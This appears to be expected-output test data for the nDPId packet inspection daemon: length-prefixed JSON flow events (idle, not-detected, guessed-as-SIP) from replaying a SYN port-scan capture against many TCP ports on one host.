-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 